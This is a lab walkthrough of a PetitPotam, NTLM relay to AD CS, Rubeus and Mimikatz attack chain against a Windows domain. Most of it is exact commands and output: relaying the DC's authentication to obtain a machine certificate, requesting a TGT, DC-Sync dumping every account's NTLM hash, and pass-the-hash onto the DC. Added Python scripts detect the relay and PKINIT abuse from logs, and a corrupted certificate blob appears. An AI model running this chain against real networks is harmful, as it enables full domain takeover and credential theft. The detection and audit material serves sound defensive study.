PetitPotam + AD-CS + Rubeus

Summary Of The Attack:

  • Get the DC machine account to connect back to you while you have an NTLM relay set up
  • Use the NTLM relay to connect to the certificate services server to obtain a certificate under the context of the machine account for the DC
  • As a standard domain user, use Rubeus to request a TGT with the certificate obtained for the DC's machine account
  • Dump the hashes using Mimikatz via a DC-Sync attack with the Kerberos ticket imported

Lab Context:

  • 1 AD server am.local (192.168.1.102) – Windows Server 2012 R2 9600
  • 1 AD-CS server (Domain Joined – 192.168.1.30)  – Windows Server 2012 R2 9600
  • Kali Machine (192.168.1.33)
  • Client (192.168.1.104) – Windows 7 SP1 7601

Attacker Machine:

To install the forked version of impacket required for the attack perform the following:

cd /opt

git clone https://github.com/ExAndroidDev/impacket

cd impacket

git switch ntlmrelayx-adcs-attack

python3 -m pip install .

cd /opt

Once installed run the NTLM Relay script using the following command:

ntlmrelayx.py -t http://192.168.1.30/certsrv/certfnsh.asp -smb2support --adcs

With the relay running, grab a copy of the PetitPotam script from GitHub and run it, setting the relay IP address (your Kali instance) and targeting the DC:

git clone https://github.com/topotam/PetitPotam.git

cd PetitPotam

python3 PetitPotam.py 192.168.1.33 192.168.1.102

root@kali:/opt/PetitPotam# python3 PetitPotam.py 192.168.1.33 192.168.1.102

PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Connecting to 192.168.1.102
Connected!
Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
Successfully bound!
Sending EfsRpcOpenFileRaw!
Got expected exception
Attack worked!
root@kali:/opt/PetitPotam#

If the attack has worked you will see that a CSR has been generated and you’ve got a certificate.

Generating CSR...
CSR generated!
Getting certificate...
GOT CERTIFICATE!
Base64 certificate of user SERVER01$:
"11Q5QIBAzCCEK8GCSqGS1b3DQEHAaCCEKAEghCcM11QmDCCBscGCSqGS1b3DQEHBqCCBrgwggaOAgEAM11GrQY JKoZ1hvcNAQcBMBwGCiqGS1b3DQEMAQMwDgQ199m9TTP8AMYCAggAg11GgDiWd*Y90E9VHyY4mS6kPJD61rZVChKd76 
Pi/QXy L3mqV1g71qHusoE8v3qRtpBySy Ls9QwaM18f11bZHU6215zpKxbømoUfrJDzJqg416hOMHK88 
1 lc1Wr f2a FAEiKMxYeyYUlP4C2i8zfoCDU3cUzoKxKn356CDqZBFbl+irgY8Ø911x04pM/z+Rveøj jpy2ChAgpSOy9ZeegQjXj1UojfTXHpcX4exWDT4hpjAwSVXv j vz9xX+VtiR++ItpNc F3dpc2 FR+ FUCOyIfhM872fbTHTKojZ36/ 
SURsqQJDCgdRRJTDDbNzTGs1U88WX2XxuuMeswNGFLw/2CEJnAKX31BQ3GnERTSØNQ1i2ZMi/m1A1xØXnXk1HØFK9RkhXn14nQnh1iWJ6BØVIDX6fOLNX43ZIØTCUdOTe1uSM4kufiNVgE/EfdJDP06xNve1ttørØfL1nECZpgY7DszqPn 
3uETxbMIij +0 Jova73RTVU2Yy jX21zu96ZzAsbn8uv4mkRVgx6uCThgDgVWThVSfxaIRqju9qUUørNuWCY2kjUK9XHW25gøy1HuWa FsSUbSxsuSlwLamFCAS2Sc80w1poUhqohe 
h JDGp LzuB8+zBrztyVjDnM/26d28TMPvyxdc37cZbb7Q211pp8qNEA8Dw7XLCmBPØR1zkuHBKxnYq2/dCROOBmOPxMYxDb5KAvm9zjyd1W3qøqV25L+x+TYZxsSurdRp1f/1d1xMVaTKK/D1mGZbBS+RbbW11brOXEZHpv1/z9ZEQ3g7N8 
*Ydbs6a9ri5Cwp la1qHw5Ar LtyBZgfcZH3MqØEj DI LHUODj bVwj6 ITQpc+Xj c40v+hWXDUPLEyDvt3gOVXj UPzmSgP+Mh/9sBxGMmHwzT3ZUOn /m9GfR2NKMM/ EwixzqkOwø LØawGK7e FKvbqUzzrbBghT9yqqiaumor L 2BYGLqrRL++ 
GiErGfnxvamnEMUrØCcL2XioXEeaFF8M28A7XnxJg3BsuT+hW/1XGn1g6X34LgRa+1RAØMzFJMxw1TMFN5+y9s8POi4Rpøe+-+j3HYf8veLYBjSrZZVLv.x5LZJsvM7gHv1X+zp1H41Z17R/Yd5/Hh1RØ3tdxgPAR2P1bØC2bVpFnJY7vK 
NtyAuQy FZwbteUc6/3hg5QUiue7XyT7QvSDmBRui1S+bQISsv5HPvGH6rEpT6P1rxmeSRe456WgAAr611Yb214pyBC8+PfkWFoNVHZLRD193NaUTJJ8Gdc9TqmmuSDPZNEki FtdØG7YLJmCLZLXIBv JMHxNeeGigcrZFaF7Su5K/K7HPS+ 
LØ7dbiIdHZ321 C9xE1sxvØe6V6xmX004W8VutebC+nA5hyb Frwwch+i jqxK7rnSEkhh+LOspip2smCOEg29j2zoqTHoSdbpNChyt 
ado L Kg+06PZQØMwdNjvrØf/sj4 L j ktwemdmiXøi1r8uobRT1hB4+gM05UirOytyq FGVudmnZøjørXJUgTiiWbXVdjY/ØEHlAL5HUQ7vUxe8Bpt6u21egbCqkQikØ LpI/+HHØS5CKWqwKAyrhVwi"DQUh LXi3YKXNDjZy20FYQxOEpKhr7 jl 
)jXqURuf1DxwraWj IamQ3C11ZgbmgGiBzsqjNng1 Sc4Ø7 j f4Ar jwR9 /ZCZpf7Sj FWJ7dcDUZVwV5KVDdMpZJom+lJTr5Øokibck3828TcriA9HUdwbMk7 xmStHTmtgm3CQkh L 9PMxBasHOWMLVwøxn7eCi 7 Sn FIh8HmøwTOz8Gi 9VVPjøx 
zMRsE9/ctXvb81kNp64X3BpmKfZ5kQ9pyRky7R9Ze8eOØ21Dhc2hgj /Yk8JUpTHeb6cNM9gA9BLfZ1zYxn3kmceh13fqs3D4Jkt7kGCw1edvJr6ØTBØ3Th50Hyej9i7PdUUEbdBVOMZY1fLKm70DRwi9b1LYvSttyuFDMOOpowOYPktk7 
A5Hj3gLqUG8nY16mJVnsSghaqmSYDcSXhUcHFRSSY30TG3TL1zM11JyQYJKoZ1hvcNAQcB011JugSCCbYwggmyM11JrgYLKoZ1hvcNAQwKAQKggg12M11JcjAcBgoqhkiG9wØBDAEDMA4ECEe+1AStCye LAg11AASCCVDDXSURmCXR38Tr 
)kjwMdaDxfySf9Hi7FvAØOJoMVSOQRdBRCX20dØ6XRvcZKØDs69DtzwgfX6NJTT13zr jHXDQVvkgp9u61rZSRzAtANE19huPu01MNq 
SudxDVfrM7 LYtEyaNwhTC7iTuz1/pRbRzczBf+1hWDGtRi/ 
ZbPcjqKwDjN9dBD03v+Jgcijq3w+CqBxSpZXIOXHJNJSpcLc/90G3fgqKpQ7aDXy2HF11Gc31fjz4tJ08BVeWtepRBXz9k2jQz6AodiDxhMnEMDQxVd6f2wAxSbk1VAVQ+-+ FsgK4jG4/XLELpuALnfQVEYp3WHFrCnQØ4itSp7RKPCB9U 
/mW6BhHdT4m+je1bj5+ 7weSØloEpt+Øn ImYWHBOfsZh jMBBn F2uuy2K5v7mICEETyQ26aB81gGwGVcKOVRxttdeXgp FfhHpf3dv2nqsTy7 j +8kQy j46sRUnzCtgp4mwcZrGou7ZCfbx5Ckn5zAt FSMtUzbQWquof6 F FtTTMG+qPØf9i50 
DDS IbbcfuuQ7s LOnzTvRBRzøwD8E3i fjMmsx9byOVprSzRAlSP2T+zIdRwYpz FPm80T/KØeSDkKpp2T2j 2kEnksGTyVhnd9KDe8PlIBtOGdsBOdbqEf iMVWNq FdXYyxga +Pfpv4i COAYC3geØ3bej 6AeOesIfTJtyxcAepOkTMaQlIBCe 
KKB3cjnLksgvcD41+ADdg3SDBWhvrwFA+wbK11YTTH1p/9SJE7SSbyTiSYzgvmg7 jrxbPnwmQROcPRHILFLGjUeENEøoew92i1b89S05YMm8WU/xV/ LkSDzUtX6QiVRvWOpxYJBfZDMpfRfv1EE 
4 COkrxØ5D7nH1 LtognHØfVqØHZawVgZwSYoOYNBrfRmqaaTNbMVKmeVCg9VfUejcHmuQS7DjPQjøaoJPAea7ibdJRMsX3cuMC6j+øtTstWRcBcBqvyzdWvDthn2ØBWTCGFOcyigTtnkBQ9qWGaBEvdWGiQhPATDySGSL2S6TR2m8bTMi 
a JWCBXaLbfzOsh2R1tzpawBnwpKN2Y6PYmM96wnez6wPaMi L 45/ j 60yBY42X61VP4cV3cDTMYVg+bybvØ3iP4S9dARGXCbGCpQJDPAMdP91TMQS136QLrbTIDICfQu08P7øiEDgiW7wrpnBpR6YchOgH4pcNMFhW1/4JBIPk6Lz4uSA7x 
SDS85FKm103820S7utnwoBkzeiJX/AsAMSIUemNDH6FaøuTBN6S11txLDSi/4niØ2CS8Nm09s7CUHwqG/1ZvZQXØ+ycfbCasØKpSnAqMAEWtmLDXtO/TJg+behWrqvn2Z3dmxbAOYsMQhobvOU1cHd1a5e8HhAY5i79zVDØwNiYj6Rbqy 
2cSFTLfPKj6b2cA3YW1iidKoBt8s7W/M/9MGNvE6JOKBcøw/C4nbPRx80DZsQQZYEpMYmS4eZ39+bLD/7avEn1ADw11SwJJ3HbEP3goD+WYOKmMKm5vqK5kVR77bRmKymhraPfØØSEqHCcOoZeJ7XuVDkCee4øzrvQGkW8xXEqfAvs7sg 
HnNQLuopCupoCMM98LsrPlKiww3PSUczr j NN LzK3NYNqSgsHl +DtiHF8aT2C5T/SRqvz8hdGHIzQTi LSD+UIG9hdeYwpuSmlzj3tThewaXeOObNkRpHp15VIx17HXei2Pj xH37ctmlDirvKgMqjrGY12ASh+j03qAffQm9vc9EREiDMjUj 
blspijir2EVKj 8s04wyq1VxsØh39cxci6 IG+YX7S+SYPh6z+kHHiKt Fq+deWfGAN002tRØYYutsDj 4wOmfønXØULiN7ZFbt4h17 /fBX92U6t LSnDhEGXw1 vIepa6A4XcMs4zMgIXTd4PqzMmOQRnxvMj88z9KpHgCxnvldNhkdvØQjFjE 
tAnP7iB13tn2Fj /01/gnrhQN2rBJfKDKØTsMOLa+2/3Ew2VoDuMgN8UkaLrxW29ØAtOj1CAexBacH19RK3S3b6Kd5ypqywaw6m9+-+NwtNVEdøa1ø/KqN36Je.oFhLxTH6E5Z+W6d+40WjHn3Sz2RrBByØCIP+1pgZtStam/U+0P9EnS5A 
NHgYwNIBj iCzNd5fIc/r7k01Qcd/Xa 188NyDFJ/NB/uPdDTiuZbWVR1edqGØdgNvHi IDEStRdfZfSYØKxhgg8DwEwsø/bxdUwfF Lv+SvhiJjwL FtMbNcZkZØJCg61SPIMteBjrlMHTb IVzE7 jrobxØEoZF6gT2g2gQFwi jMf7mQLk7ØjTZ 
pcccoNTq/C311nDrYARs30aEhoeØ7K6HSQrZaeCB8wpnMOzPcBWr/ jMbSfOCiv7aUdeZNYWYrzrMsZD96ZvSuPdbWDPJIMKLgvODnXJN046tkF/MØ5EEYPZ/FzXi41zxøyDTUPRT41CELnpmJxEw40RHSE78FSqk1r9vWx16XPzr3bYgct 
aØ85VOt FWMsD1gM2vAMCPtMiøxMN4Cc9cZGGVYITedvvJ8QKS1i LQtJjCzPU3roJh4T72Ba08g22SuewxdzXaTYAgCJ1eKqntxGøoD+60FQAjU8apSOØ5dfwxEIMAenØfC4tytVHtYdF9PD01 
jzjafMfoSqp+TthHAbVcYVGWcjzEqBvQWwb FldrOj fvsOosrfrYYrTw4Ø7Wnj6h7teadvRHmkh FXqQh F+ZGWf4049j Dc j IU2db7K+ywp90bplC17nhmoejbt86ØwXu8drz2UdpSH11j F vo 
iM+ebEvVk3bL3m/gY4UØCHkL4LPseYRRGPHSYbevxcSFkcvUeg48MbSP4tMvxCVWZIOqGZ43AsQNeKb6v13N80AS53dOSqqnEWIUonkYv2RSAsLSMOcmMVviDhØ EWBBS9sSMØ4ihw63dG 
SzxpMØ4ZqLr+oTAtMCEwCQYFKw4DAhoFAAQUØPqLUMcaAF18P/Xiq+f5nWDwbEØECN+3fmY2gs65

Checking on the PKI server should show that the machine account of the DC has had certificates issued to it:

Screenshot of certsrv on the AD CS server (Certification Authority (Local) > am-AD-CS-CA > Issued Certificates). Alongside the CA Exchange certificate for AM\AD-CS$ and two User (User) certificates for AM\Administrator and AM\user, a run of requests from Request ID 722 onwards shows Requester Name AM\SERVER01$ with Certificate Template Computer (Machine), Certificate Effective Date 27/07/2021 23:33 and Certificate Expiration Date 27/07/2022 23:33.
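From the defender's side, the relayed enrollment leaves a trace on the AD CS server: the IIS log for the web enrollment pages records the relayed account (here the DC's machine account) as cs-username and the relay host as c-ip. The following detection is an added example and not part of the original write-up; the IIS W3C log lines and the machine-account-to-host mapping are constructed for the lab above.

```python
"""Flag AD CS web enrollment requests authenticated as a machine account.
A relayed DC authentication lands on /certsrv/certfnsh.asp with cs-username
set to the DC's account and c-ip set to the relay host, as in the
constructed IIS W3C log sample below (field order comes from #Fields)."""

SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-07-27 23:33:01 192.168.1.30 GET /certsrv/certrqxt.asp - 80 AM\\user 192.168.1.104 - 200
2021-07-27 23:33:05 192.168.1.30 POST /certsrv/certfnsh.asp - 80 AM\\user 192.168.1.104 - 200
2021-07-27 23:33:40 192.168.1.30 POST /certsrv/certfnsh.asp - 80 AM\\SERVER01$ 192.168.1.33 - 200
2021-07-27 23:33:41 192.168.1.30 GET /certsrv/certnew.cer ReqID=724&Enc=b64 80 AM\\SERVER01$ 192.168.1.33 - 200
"""

# Constructed map of machine accounts to the host they should enrol from.
EXPECTED_HOST = {"AM\\SERVER01$": "192.168.1.102"}

# Pages hit when a certificate request is submitted and its result fetched.
WEB_ENROLL_PATHS = ("/certsrv/certfnsh.asp", "/certsrv/certnew.cer")

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_machine_account_enrollments(log_text):
    """One finding per web enrollment record made by a '$' account. Machines
    enrol via autoenrollment (RPC/DCOM), so a machine account on the web pages
    is suspicious; a source IP that is not the machine's own points at relay."""
    findings = []
    for rec in parse_w3c(log_text):
        user, ip, uri = rec.get("cs-username", "-"), rec.get("c-ip"), rec.get("cs-uri-stem", "").lower()
        if uri not in WEB_ENROLL_PATHS or not user.endswith("$"):
            continue
        expected = EXPECTED_HOST.get(user)
        reason = "machine account used web enrollment"
        if expected and expected != ip:
            reason += f"; source {ip} is not {user}'s host {expected}"
        findings.append({"time": f"{rec['date']} {rec['time']}", "account": user,
                         "client_ip": ip, "uri": uri, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in find_machine_account_enrollments(SAMPLE_IIS_LOG):
        print(f"[!] {f['time']} {f['account']} {f['uri']} from {f['client_ip']}: {f['reason']}")
```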

Requesting a TGT using Rubeus

Install Visual Studio 2019 and compile the Rubeus executable

(Version 1.6.4 was being used here)

https://github.com/GhostPack/Rubeus

Once compiled perform the following command in order to obtain a Kerberos ticket under the context of the machine account for the DC:

Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt

C:\Users\user\Downloads\Rubeus>Rubeus.exe asktgt /user:SERVER01$ /certificate:<base64-certificate> /ptt

  v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=SERVER01
[*] Building AS-REQ (w/ PKINIT preauth) for: 'am.local\SERVER01$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/am.local
  ServiceRealm          :  AM.LOCAL
  UserName              :  SERVER01$
  UserRealm             :  AM.LOCAL
  StartTime             :  02/08/2021
  EndTime               :  03/08/2021
  RenewTill             :  09/08/2021
  Flags                 :  name_canonicalize, pre_authent, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  <omitted>
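The PKINIT request above is visible on the DC as Kerberos event ID 4768 with Pre-Authentication Type 16 and a populated Certificate Information section. The following parser and check is an added example, not from the original write-up or Rubeus: it flags a machine account's certificate logon coming from an address other than that machine, and the weak RC4 etype (0x17) that the request above used. The 4768 message bodies and the expected-host map are constructed for the lab above.

```python
"""Parse the message text of Security event 4768 (TGT requested) and flag
PKINIT (Pre-Authentication Type 16) logons that misuse a machine account's
certificate. Sample events below are constructed in the Event Viewer
'Field:<tab>value' layout."""
import re

SAMPLE_4768 = [
"""A Kerberos authentication ticket (TGT) was requested.
Account Information:
\tAccount Name:\t\tSERVER01$
\tSupplied Realm Name:\tam.local
Network Information:
\tClient Address:\t\t::ffff:192.168.1.102
Additional Information:
\tTicket Encryption Type:\t0x12
\tPre-Authentication Type:\t2
""",
"""A Kerberos authentication ticket (TGT) was requested.
Account Information:
\tAccount Name:\t\tSERVER01$
\tSupplied Realm Name:\tam.local
Network Information:
\tClient Address:\t\t::ffff:192.168.1.104
Additional Information:
\tTicket Encryption Type:\t0x17
\tPre-Authentication Type:\t16
Certificate Information:
\tCertificate Issuer Name:\t\tam-AD-CS-CA
\tCertificate Serial Number:\tCONSTRUCTED-SERIAL
""",
]

# Constructed map of machine accounts to the address they normally log on from.
EXPECTED_HOST = {"SERVER01$": "192.168.1.102"}

# Section headers ("Account Information:") have no tab after the colon, so only real fields match.
FIELD_RE = re.compile(r"^\s*([A-Za-z -]+):\t+(.*)$", re.M)

def parse_4768(message):
    """Return the event's fields as a dict of stripped name -> value."""
    return {k.strip(): v.strip() for k, v in FIELD_RE.findall(message)}

def pkinit_findings(message):
    """List of reasons this 4768 is suspicious; empty for non-PKINIT or clean events."""
    ev = parse_4768(message)
    if ev.get("Pre-Authentication Type") != "16":   # 16 = PA-PK-AS-REQ (PKINIT)
        return []
    acct = ev.get("Account Name", "")
    addr = ev.get("Client Address", "").replace("::ffff:", "")
    findings = []
    if acct.endswith("$") and EXPECTED_HOST.get(acct) not in (None, addr):
        findings.append(f"{acct} PKINIT from {addr}, expected {EXPECTED_HOST[acct]}")
    if ev.get("Ticket Encryption Type", "").lower() == "0x17":
        findings.append(f"{acct} PKINIT TGT issued with RC4 (0x17)")
    return findings
```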

Executing the command ‘klist’ shows we have a Kerberos ticket under the context of the machine account. From here we can perform a DC-Sync attack using Mimikatz to grab the NTLM hashes of all the domain accounts:

lsadump::dcsync /domain:am.local /all /csv

mimikatz # lsadump::dcsync /domain:am.local /all /csv
[DC] 'am.local' will be the domain
[DC] 'SERVER01.am.local' will be the DC server
[DC] Exporting domain 'am.local'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
(CSV rows of RID, account name, NTLM hash and userAccountControl follow for every domain account: krbtgt, the client machine accounts, the administrator and user accounts, AD-CS$ and SERVER01$; hash values omitted here)

The whole attack in a GIF 😊

We can then use the NTLM hashes obtained from Mimikatz in a pass-the-hash (PTH) attack (requires an elevated terminal):

mimikatz.exe

privilege::debug

sekurlsa::pth /user:am /domain:am.local /ntlm:5c0c009b522xxxxxxxxxxxxxxxxxxxx

net use x: \\SERVER01\c$

dir X:

Screenshot: in the original user's prompt, net use x: \\SERVER01\c$ is rejected with "The password is invalid". After sekurlsa::pth /user:am /domain:am.local /ntlm:... mimikatz reports the LSA process patched and the rc4 key replaced (OK) and spawns a new cmd.exe; in that prompt net use x: \\SERVER01\c$ completes successfully and dir X: lists the DC's system drive (PerfLogs, Program Files, Program Files (x86), share, Windows).

Congrats, now you own the target network 😊

Auditing:

https://github.com/GhostPack/PSPKIAudit

https://github.com/GhostPack/Certify

https://github.com/GhostPack/ForgeCert

https://posts.specterops.io/certified-pre-owned-d95910965cd2

Resources:

https://twitter.com/wdormann/status/1418576755389083662/photo/4

https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf